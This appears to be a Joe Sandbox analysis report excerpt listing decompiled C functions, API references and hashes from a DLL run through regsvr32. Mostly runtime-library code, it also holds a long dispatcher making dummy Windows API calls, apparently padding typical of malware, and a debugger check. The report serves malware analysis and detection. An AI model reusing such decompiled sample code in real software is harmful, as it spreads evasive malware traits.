Instruction ID: 9c4ed5606a50b862596ffbdb0575fe5ed869a33cfe87e5869a1d9c676474c4fb
Opcode Fuzzy Hash: e8b0df0e6ef322cf0c78ac3d1d976687ce010d6789d2f39d6afa88a9f202ee70
Instruction Fuzzy Hash: 26E0E53126175056EB2016774C02B9A766CDFA37B0F024212ACD4DA0C0CF21F80096E7

Uniqueness

Uniqueness Score: -1.00%

Function 6F6C19F0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6F6C19F0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				_v16 = E6F6C2190(__eflags);
				_v8 =  *((intOrPtr*)(E6F6C12B0(_a8)));
				_v12 =  *((intOrPtr*)(E6F6C12B0(_a4)));
				return StrCmpIW(_v12, _v8);
			}

0x6f6c19f6
0x6f6c19fe
0x6f6c1a0c
0x6f6c1a1a
0x6f6c1a2b

APIs

StrCmpIW.KERNELBASE(?,00000000,?,6F6C5D13,?,6F6C5D13,?,00000000,6F6C265E,E463DA3C,?,6F6C5DAA), ref: 6F6C1A25

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
Instruction ID: 1afaf14d487f2d79ad1a59c55e07072c419e74b60c369f7d7b181ee3f5cac977
Opcode Fuzzy Hash: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
Instruction Fuzzy Hash: CDE0ED79D00308AFCB04EFE8C58089EBBB8EF48300F108699EA5597340DB34DA50DBD9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F6C9839 Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6F6C9839(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6F6C9954(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6F6CA330(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6F6CA330(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6F6C9954(_t49);
				}
				return _t49;
			}

0x6f6c9839
0x6f6c9839
0x6f6c9839
0x6f6c984d
0x6f6c984f
0x6f6c9852
0x6f6c9852
0x6f6c9856
0x6f6c985b
0x6f6c9873
0x6f6c9879
0x6f6c987f
0x6f6c9885
0x6f6c988b
0x6f6c9891
0x6f6c9897
0x6f6c989e
0x6f6c98a5
0x6f6c98ac
0x6f6c98b3
0x6f6c98ba
0x6f6c98c1
0x6f6c98c2
0x6f6c98cb
0x6f6c98d1
0x6f6c98d4
0x6f6c98da
0x6f6c98e9
0x6f6c98f5
0x6f6c9900
0x6f6c9907
0x6f6c990e
0x6f6c9919
0x6f6c9921
0x6f6c992a
0x6f6c992c
0x6f6c992f
0x6f6c9931
0x6f6c993b
0x6f6c9943
0x6f6c9949
0x00000000
0x6f6c9950
0x6f6c9953

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F6C9845
IsDebuggerPresent.KERNEL32 ref: 6F6C9911
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F6C9931
UnhandledExceptionFilter.KERNEL32(?), ref: 6F6C993B

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 93ff761db1d3f140fe2f6193cbfc0cf3545064bc51e6bfe128ee085ca4235fdb
Instruction ID: 9247531e4577c2b96153e7d5ed776e2a3fcf679c23ecfaf15a9c0e15dfea4ff9
Opcode Fuzzy Hash: 93ff761db1d3f140fe2f6193cbfc0cf3545064bc51e6bfe128ee085ca4235fdb
Instruction Fuzzy Hash: F8312575D053199BDF10DFA4C9897CDBBB8EF08308F1041AAE44DAB280EB709A898F45

Uniqueness

Uniqueness Score: -1.00%

Function 6F6C8630 Relevance: 63.3, APIs: 35, Strings: 1, Instructions: 327
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E6F6C8630(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				long _v12;
				int _v16;
				int _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				int _v44;
				struct HMENU__* _v48;
				intOrPtr _v52;
				int _v56;
				WCHAR* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				int _v72;
				intOrPtr _v76;
				long _v80;
				long _v84;
				long _v88;
				long _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				struct _SID_IDENTIFIER_AUTHORITY* _v120;
				int _v124;
				int _v128;
				int _v132;
				intOrPtr _v136;
				long _v140;
				long _v144;
				void* _v148;
				char _v164;
				void* _t116;
				intOrPtr _t118;
				void* _t180;

				if((E6F6C5D90(__eflags) & 0x000000ff) == 0) {
					L87:
					__eflags = 0;
					return 0;
				}
				_t184 = _a4;
				if(_a4 == 0) {
					goto L87;
				}
				_t116 = E6F6C5910(_t184);
				_t185 = _t116;
				if(_t116 == 0) {
					return 1;
				}
				_t118 = E6F6C7700(_t185);
				if(_t118 == 0) {
					return 1;
				}
				if(_a4 == 2) {
					_v12 = FormatMessageA(0, 0, 0, 0, 0, 0, 0);
					return _a4;
				}
				__eflags = _a4 - 3;
				if(_a4 == 3) {
					_v16 = TextOutW(0, 0, 0, 0, 0);
					return _a4;
				}
				__eflags = _a4 - 4;
				if(_a4 != 4) {
					__eflags = _a4 - 5;
					if(_a4 != 5) {
						__eflags = _a4 - 6;
						if(_a4 != 6) {
							__eflags = _a4 - 7;
							if(_a4 != 7) {
								__eflags = _a4 - 8;
								if(_a4 != 8) {
									__eflags = _a4 - 9;
									if(_a4 != 9) {
										__eflags = _a4 - 0xa;
										if(_a4 != 0xa) {
											__eflags = _a4 - 0xb;
											if(_a4 != 0xb) {
												__eflags = _a4 - 0xc;
												if(_a4 != 0xc) {
													__eflags = _a4 - 0xd;
													if(_a4 != 0xd) {
														__eflags = _a4 - 0xe;
														if(_a4 != 0xe) {
															__eflags = _a4 - 0xf;
															if(_a4 != 0xf) {
																__eflags = _a4 - 0x10;
																if(_a4 != 0x10) {
																	__eflags = _a4 - 0x11;
																	if(_a4 != 0x11) {
																		__eflags = _a4 - 0x12;
																		if(_a4 != 0x12) {
																			__eflags = _a4 - 0x13;
																			if(_a4 != 0x13) {
																				__eflags = _a4 - 0x14;
																				if(_a4 != 0x14) {
																					__eflags = _a4 - 0x15;
																					if(_a4 != 0x15) {
																						__eflags = _a4 - 0x16;
																						if(_a4 != 0x16) {
																							__eflags = _a4 - 0x17;
																							if(_a4 != 0x17) {
																								__eflags = _a4 - 0x18;
																								if(_a4 != 0x18) {
																									__eflags = _a4 - 0x19;
																									if(_a4 != 0x19) {
																										__eflags = _a4 - 0x1a;
																										if(_a4 != 0x1a) {
																											__eflags = _a4 - 0x1b;
																											if(_a4 != 0x1b) {
																												__eflags = _a4 - 1;
																												if(_a4 == 1) {
																													__eflags = _a8;
																													if(_a8 != 0) {
																														__eflags = E6F6C7670();
																														if(__eflags == 0) {
																															_t118 = E6F6C6960(_t180);
																															__eflags = _t118;
																															if(_t118 != 0) {
																																_t118 = E6F6C7770();
																																_v8 = _t118;
																																__eflags = _v8 - 1;
																																if(_v8 == 1) {
																																	__eflags = E6F6C71E0();
																																	if(__eflags == 0) {
																																		_t118 = E6F6C6390(__eflags);
																																	} else {
																																		_t118 = E6F6C6390(__eflags);
																																	}
																																}
																															}
																														} else {
																															_t118 = E6F6C6390(__eflags);
																														}
																													}
																												}
																												__eflags = _a4 - 0x1c;
																												if(_a4 != 0x1c) {
																													__eflags = _a4 - 0x1d;
																													if(_a4 != 0x1d) {
																														__eflags = _a4 - 0x1e;
																														if(_a4 != 0x1e) {
																															__eflags = _a4 - 0x1f;
																															if(_a4 != 0x1f) {
																																__eflags = _a4 - 0x20;
																																if(_a4 != 0x20) {
																																	__eflags = _a4 - 0x21;
																																	if(_a4 != 0x21) {
																																		__eflags = _a4 - 0x22;
																																		if(_a4 != 0x22) {
																																			__eflags = _a4 - 0x23;
																																			if(_a4 != 0x23) {
																																				__eflags = _a4 - 0x24;
																																				if(_a4 != 0x24) {
																																					goto L87;
																																				}
																																				_v148 = DuplicateIcon(0, 0);
																																				return _a4;
																																			}
																																			_v144 = SHStrDupA(0, 0);
																																			return _a4;
																																		}
																																		_v140 = SHStrDupW(0, 0);
																																		return _a4;
																																	}
																																	__imp__CreateMutexExW(0, 0, 0, 0);
																																	_v136 = _t118;
																																	return _a4;
																																}
																																_v132 = IsValidSid(0);
																																return _a4;
																															}
																															_v128 = IsValidAcl(0);
																															return _a4;
																														}
																														_v124 = DisableThreadLibraryCalls(0);
																														return _a4;
																													}
																													_v120 = GetSidIdentifierAuthority(0);
																													return _a4;
																												}
																												__imp__CoTaskMemAlloc(0);
																												_v116 = _t118;
																												return _a4;
																											}
																											__imp__CoCancelCall(0, 0);
																											_v112 = _t118;
																											return _a4;
																										}
																										__imp__CveEventWrite(0, 0);
																										_v108 = _t118;
																										return _a4;
																									}
																									__imp__RpcExceptionFilter(0);
																									_v104 = _t118;
																									return _a4;
																								}
																								_v100 = RevertToSelf();
																								return _a4;
																							}
																							__imp__IsTokenRestricted(0);
																							_v96 = _t118;
																							return _a4;
																						}
																						_v92 = GetProcessId(0);
																						return _a4;
																					}
																					_v88 = GetPriorityClass(0);
																					return _a4;
																				}
																				_v84 = GetVersion();
																				return _a4;
																			}
																			_v80 = GetMessageTime();
																			return _a4;
																		}
																		__imp__UuidCreate(0);
																		_v76 = _t118;
																		return _a4;
																	}
																	_v72 = GetConsoleCP();
																	return _a4;
																}
																__imp__DceErrorInqTextA(0, 0);
																_v68 = _t118;
																return _a4;
															}
															__imp__SHGetThreadRef(0);
															_v64 = _t118;
															return _a4;
														}
														_v60 = CharNextW(0);
														return _a4;
													}
													_v56 = SetFileAttributesW(0, 0);
													return _a4;
												}
												__imp__GetProductInfo(0, 0, 0, 0, 0);
												_v52 = _t118;
												return _a4;
											}
											_v48 = CreatePopupMenu();
											return _a4;
										}
										_v44 = FlattenPath(0);
										return _a4;
									}
									__imp__CoGetCallerTID(0);
									_v40 = _t118;
									return _a4;
								}
								__imp__CoCreateInstance( &_v164, 0, 0,  &_v164, 0);
								_v36 = _t118;
								return _a4;
							}
							__imp__OleInitialize(0);
							_v32 = _t118;
							return _a4;
						}
						__imp__CoInitialize(0);
						_v28 = _t118;
						return _a4;
					}
					_v24 = FormatMessageW(0, 0, 0, 0, 0, 0, 0);
					return _a4;
				} else {
					_v20 = TextOutA(0, 0, 0, 0, 0);
					return _a4;
				}
			}

0x6f6c8643
0x6f6c8a7e
0x6f6c8a7e
0x00000000
0x6f6c8a7e
0x6f6c8649
0x6f6c864d
0x00000000
0x00000000
0x6f6c8653
0x6f6c8658
0x6f6c865a
0x00000000
0x6f6c8a77
0x6f6c8660
0x6f6c8667
0x00000000
0x6f6c8a6e
0x6f6c8671
0x6f6c8687
0x00000000
0x6f6c868a
0x6f6c8692
0x6f6c8696
0x6f6c86a8
0x00000000
0x6f6c86ab
0x6f6c86b3
0x6f6c86b7
0x6f6c86d4
0x6f6c86d8
0x6f6c86f9
0x6f6c86fd
0x6f6c8712
0x6f6c8716
0x6f6c872b
0x6f6c872f
0x6f6c8756
0x6f6c875a
0x6f6c876f
0x6f6c8773
0x6f6c8788
0x6f6c878c
0x6f6c879f
0x6f6c87a3
0x6f6c87c0
0x6f6c87c4
0x6f6c87db
0x6f6c87df
0x6f6c87f4
0x6f6c87f8
0x6f6c880d
0x6f6c8811
0x6f6c8828
0x6f6c882c
0x6f6c883f
0x6f6c8843
0x6f6c8858
0x6f6c885c
0x6f6c886f
0x6f6c8873
0x6f6c8886
0x6f6c888a
0x6f6c889f
0x6f6c88a3
0x6f6c88b8
0x6f6c88bc
0x6f6c88d1
0x6f6c88d5
0x6f6c88e8
0x6f6c88ec
0x6f6c8901
0x6f6c8905
0x6f6c891c
0x6f6c8920
0x6f6c8937
0x6f6c893b
0x6f6c893d
0x6f6c8941
0x6f6c8948
0x6f6c894a
0x6f6c8953
0x6f6c8958
0x6f6c895a
0x6f6c895c
0x6f6c8961
0x6f6c8964
0x6f6c8968
0x6f6c896f
0x6f6c8971
0x6f6c897a
0x6f6c8973
0x6f6c8973
0x6f6c8973
0x6f6c8971
0x6f6c8968
0x6f6c894c
0x6f6c894c
0x6f6c894c
0x6f6c894a
0x6f6c8941
0x6f6c897f
0x6f6c8983
0x6f6c8998
0x6f6c899c
0x6f6c89b1
0x6f6c89b5
0x6f6c89ca
0x6f6c89ce
0x6f6c89e3
0x6f6c89e7
0x6f6c89fc
0x6f6c8a00
0x6f6c8a1b
0x6f6c8a1f
0x6f6c8a36
0x6f6c8a3a
0x6f6c8a51
0x6f6c8a55
0x00000000
0x6f6c8a75
0x6f6c8a61
0x00000000
0x6f6c8a67
0x6f6c8a46
0x00000000
0x6f6c8a4c
0x6f6c8a2b
0x00000000
0x6f6c8a31
0x6f6c8a0a
0x6f6c8a10
0x00000000
0x6f6c8a16
0x6f6c89f1
0x00000000
0x6f6c89f4
0x6f6c89d8
0x00000000
0x6f6c89db
0x6f6c89bf
0x00000000
0x6f6c89c2
0x6f6c89a6
0x00000000
0x6f6c89a9
0x6f6c8987
0x6f6c898d
0x00000000
0x6f6c8990
0x6f6c8926
0x6f6c892c
0x00000000
0x6f6c892f
0x6f6c890b
0x6f6c8911
0x00000000
0x6f6c8914
0x6f6c88f0
0x6f6c88f6
0x00000000
0x6f6c88f9
0x6f6c88dd
0x00000000
0x6f6c88e0
0x6f6c88c0
0x6f6c88c6
0x00000000
0x6f6c88c9
0x6f6c88ad
0x00000000
0x6f6c88b0
0x6f6c8894
0x00000000
0x6f6c8897
0x6f6c887b
0x00000000
0x6f6c887e
0x6f6c8864
0x00000000
0x6f6c8867
0x6f6c8847
0x6f6c884d
0x00000000
0x6f6c8850
0x6f6c8834
0x00000000
0x6f6c8837
0x6f6c8817
0x6f6c881d
0x00000000
0x6f6c8820
0x6f6c87fc
0x6f6c8802
0x00000000
0x6f6c8805
0x6f6c87e9
0x00000000
0x6f6c87ec
0x6f6c87d0
0x00000000
0x6f6c87d3
0x6f6c87af
0x6f6c87b5
0x00000000
0x6f6c87b8
0x6f6c8794
0x00000000
0x6f6c8797
0x6f6c877d
0x00000000
0x6f6c8780
0x6f6c875e
0x6f6c8764
0x00000000
0x6f6c8767
0x6f6c8745
0x6f6c874b
0x00000000
0x6f6c874e
0x6f6c871a
0x6f6c8720
0x00000000
0x6f6c8723
0x6f6c8701
0x6f6c8707
0x00000000
0x6f6c870a
0x6f6c86ee
0x00000000
0x6f6c86b9
0x6f6c86c9
0x00000000
0x6f6c86cc

APIs

Part of subcall function 6F6C5D90: LoadLibraryA.KERNELBASE(?,KERNEL32.dll,00000000), ref: 6F6C5EBF

FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F6C8681
TextOutW.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 6F6C86A2

Strings

$, xrefs: 6F6C8A51

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: FormatLibraryLoadMessageText
String ID: $
API String ID: 775064453-3993045852
Opcode ID: 79b469f437ce9add6b0667e5aa7e424f165fa8d196a9f403bcc3a4c3e9f2bb72
Instruction ID: 917d833631ca062c3f42eeb4aa492ed0fae40792e8d74f124cd272dff4a3ae5b
Opcode Fuzzy Hash: 79b469f437ce9add6b0667e5aa7e424f165fa8d196a9f403bcc3a4c3e9f2bb72
Instruction Fuzzy Hash: A2C19830A49248EFDB64DFBEC54478C7BB0EF06756F108116E9899B651DB70A980CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6F6D0367 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F6D0367(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6f6dc708) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6F6CDC0E(_t46);
							E6F6D180D( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6F6CDC0E(_t47);
							E6F6D190B( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6F6CDC0E( *((intOrPtr*)(_t74 + 0x7c)));
						E6F6CDC0E( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6F6CDC0E( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6F6CDC0E( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6F6CDC0E( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6F6CDC0E( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6F6D04D8( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6f6dc1d8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6F6CDC0E(_t31);
							E6F6CDC0E( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6F6CDC0E(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6F6CDC0E(_t74);
			}

0x6f6d036f
0x6f6d0373
0x6f6d037b
0x6f6d0384
0x6f6d0389
0x6f6d0390
0x6f6d0398
0x6f6d03a0
0x6f6d03ab
0x6f6d03b1
0x6f6d03b2
0x6f6d03ba
0x6f6d03c2
0x6f6d03cd
0x6f6d03d3
0x6f6d03d7
0x6f6d03e2
0x6f6d03e8
0x6f6d0389
0x6f6d03e9
0x6f6d03f1
0x6f6d0404
0x6f6d0417
0x6f6d0425
0x6f6d0430
0x6f6d0435
0x6f6d043e
0x6f6d0446
0x6f6d0447
0x6f6d044d
0x6f6d0450
0x6f6d0453
0x6f6d045a
0x6f6d045c
0x6f6d0460
0x6f6d0468
0x6f6d046f
0x6f6d0475
0x6f6d0476
0x6f6d0476
0x6f6d047d
0x6f6d047f
0x6f6d0484
0x6f6d048c
0x6f6d0491
0x6f6d0492
0x6f6d0492
0x6f6d0495
0x6f6d0498
0x6f6d049b
0x6f6d049e
0x6f6d049e
0x6f6d04ae

APIs

___free_lconv_mon.LIBCMT ref: 6F6D03AB

Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D182A
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D183C
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D184E
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D1860
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D1872
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D1884
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D1896
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D18A8
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D18BA
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D18CC
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D18DE
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D18F0
Part of subcall function 6F6D180D: _free.LIBCMT ref: 6F6D1902

_free.LIBCMT ref: 6F6D03A0

Part of subcall function 6F6CDC0E: HeapFree.KERNEL32(00000000,00000000,?,6F6D199E,?,00000000,?,?,?,6F6D19C5,?,00000007,?,?,6F6D04FE,?), ref: 6F6CDC24
Part of subcall function 6F6CDC0E: GetLastError.KERNEL32(?,?,6F6D199E,?,00000000,?,?,?,6F6D19C5,?,00000007,?,?,6F6D04FE,?,?), ref: 6F6CDC36

_free.LIBCMT ref: 6F6D03C2
_free.LIBCMT ref: 6F6D03D7
_free.LIBCMT ref: 6F6D03E2
_free.LIBCMT ref: 6F6D0404
_free.LIBCMT ref: 6F6D0417
_free.LIBCMT ref: 6F6D0425
_free.LIBCMT ref: 6F6D0430
_free.LIBCMT ref: 6F6D0468
_free.LIBCMT ref: 6F6D046F
_free.LIBCMT ref: 6F6D048C
_free.LIBCMT ref: 6F6D04A4

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 618baa0bbe23444a12eb5b34f875b46c6dd063d3cf2aa8ec3eb8aac39a279a71
Instruction ID: 7d7af6c4d5bdbd4c76446bd573ab097ec03063e36eb525daea14d2973b34cd93
Opcode Fuzzy Hash: 618baa0bbe23444a12eb5b34f875b46c6dd063d3cf2aa8ec3eb8aac39a279a71
Instruction Fuzzy Hash: 21317C71644305EFEB218A79DA40B8A73FEEF40354F10952AF1A5DB194DBB0F881CB25

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CD878 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6F6CD878(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x6f6d5f50;
				if(_t68 != 0x6f6d5f50) {
					E6F6CDC0E(_t68);
					_t36 = _a4;
				}
				E6F6CDC0E( *((intOrPtr*)(_t36 + 0x3c)));
				E6F6CDC0E( *((intOrPtr*)(_a4 + 0x30)));
				E6F6CDC0E( *((intOrPtr*)(_a4 + 0x34)));
				E6F6CDC0E( *((intOrPtr*)(_a4 + 0x38)));
				E6F6CDC0E( *((intOrPtr*)(_a4 + 0x28)));
				E6F6CDC0E( *((intOrPtr*)(_a4 + 0x2c)));
				E6F6CDC0E( *((intOrPtr*)(_a4 + 0x40)));
				E6F6CDC0E( *((intOrPtr*)(_a4 + 0x44)));
				E6F6CDC0E( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6F6CD6A4(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6F6CD70F(_t67, _t72, _t73, _t77);
			}

0x6f6cd878
0x6f6cd878
0x6f6cd878
0x6f6cd87d
0x6f6cd883
0x6f6cd885
0x6f6cd88b
0x6f6cd88e
0x6f6cd893
0x6f6cd896
0x6f6cd89a
0x6f6cd8a5
0x6f6cd8b0
0x6f6cd8bb
0x6f6cd8c6
0x6f6cd8d1
0x6f6cd8dc
0x6f6cd8e7
0x6f6cd8f5
0x6f6cd900
0x6f6cd908
0x6f6cd909
0x6f6cd90c
0x6f6cd912
0x6f6cd916
0x6f6cd91a
0x6f6cd91b
0x6f6cd925
0x6f6cd92b
0x6f6cd92c
0x6f6cd92f
0x6f6cd935
0x6f6cd939
0x6f6cd93d
0x6f6cd944

APIs

_free.LIBCMT ref: 6F6CD88E

Part of subcall function 6F6CDC0E: HeapFree.KERNEL32(00000000,00000000,?,6F6D199E,?,00000000,?,?,?,6F6D19C5,?,00000007,?,?,6F6D04FE,?), ref: 6F6CDC24
Part of subcall function 6F6CDC0E: GetLastError.KERNEL32(?,?,6F6D199E,?,00000000,?,?,?,6F6D19C5,?,00000007,?,?,6F6D04FE,?,?), ref: 6F6CDC36

_free.LIBCMT ref: 6F6CD89A
_free.LIBCMT ref: 6F6CD8A5
_free.LIBCMT ref: 6F6CD8B0
_free.LIBCMT ref: 6F6CD8BB
_free.LIBCMT ref: 6F6CD8C6
_free.LIBCMT ref: 6F6CD8D1
_free.LIBCMT ref: 6F6CD8DC
_free.LIBCMT ref: 6F6CD8E7
_free.LIBCMT ref: 6F6CD8F5

Strings

P_mo, xrefs: 6F6CD885

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
